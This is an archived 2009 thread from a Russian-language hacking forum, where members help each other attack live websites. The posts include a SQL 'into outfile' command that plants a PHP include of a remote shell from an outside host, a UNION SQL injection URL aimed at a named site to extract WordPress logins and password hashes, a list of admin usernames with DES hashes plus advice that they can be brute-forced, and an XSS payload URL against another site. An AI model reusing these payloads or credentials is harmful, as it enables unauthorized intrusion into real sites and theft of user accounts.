ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
23.05.2009, 02:34
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от slammer
уже разобрался надо просто --+ добавлять и тогда работает. может ктонибудь объяснит в чем принципиальная разница между /* и --+ ?
зависит от версии mysql. Поэтому, не зная заранее, только методом научного тыка
|
|
|
23.05.2009, 02:35
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 94
Провел на форуме:
999862
Репутация:
19
|
|
пытаюсь залить шелл через phpmyadmin...
командой
select '<? @include("http://xxx.com/shell.txt"); ?>' into outfile '/usr/local/www/main/shell.php';
выдает ошибку
"Вероятно, размер загружаемого файла слишком велик. Способы обхода данного ограничения описаны в документации "
вес шелла 22кб
как обойти ?по албански не особо шарю
зы версия phpmyadmin 2.11.1.1
|
|
|
|
23.05.2009, 02:38
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Я бы тебе дал код, но это приват. А вообще:
вот этого будет достаточно для инклуда, при любых условиях |
|
|
|
23.05.2009, 03:08
|
|
Новичок
Регистрация: 02.05.2009
Сообщений: 11
Провел на форуме:
69162
Репутация:
0
|
|
прочитал таблицы в information_schema и попробовал достать пароль:
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(concat_ws(0x3a,user_lo gin,%20%20user_pass)+using+latin1),4,5,6,7,8+from+ wp_users/*
но выдает почемуто: Oops Table 'mcli_resources.wp_users' doesn't exist
как такое может быть?
|
|
|
|
23.05.2009, 06:34
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
мде
blog_its.wp_users
табла в другой бд
select table_schema from information_schema.tables
ПОЧИТАЙ ПОДПИСЬ jokester ,КРАСНЫМ ВЫДЕЛЕН0
Последний раз редактировалось S00pY; 23.05.2009 в 06:38..
|
|
|
|
23.05.2009, 11:57
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме:
190310
Репутация:
7
|
|
Админка TIGERADMIN v.9. ХЗ что за админка и как пароли зашифрованы.
Кто что думает ?
jerebear : ta21XwWv/Yggk
jason : taqBB1ZND3PQQ
jtougas : ta5MCLrEnx97A
AquaticManagers : taYnG8mr9LTts
|
|
|
|
23.05.2009, 13:21
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
DES
|
|
|
|
23.05.2009, 14:19
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме:
190310
Репутация:
7
|
|
У всех приставка ta в начале почему то, её просто отбрасывать перед брутом..... Вообще можно сбрутить?
|
|
|
|
23.05.2009, 18:16
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
можно.
|
|
|
|
23.05.2009, 21:34
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
нашел активную xss на mioo. Но докрутить до конца никак не получается.....может быть кто нить объяснит, буду оочень благодарен:
http://www.mioo.ru/podrazdinfpage.php?id=10&prjid=640&ctree=cccccccc& onewnd=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Sca nner+Test%27%29%3C%2Fscript%3E%3C%22&list=tasks&ta skid=8&pv=no
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
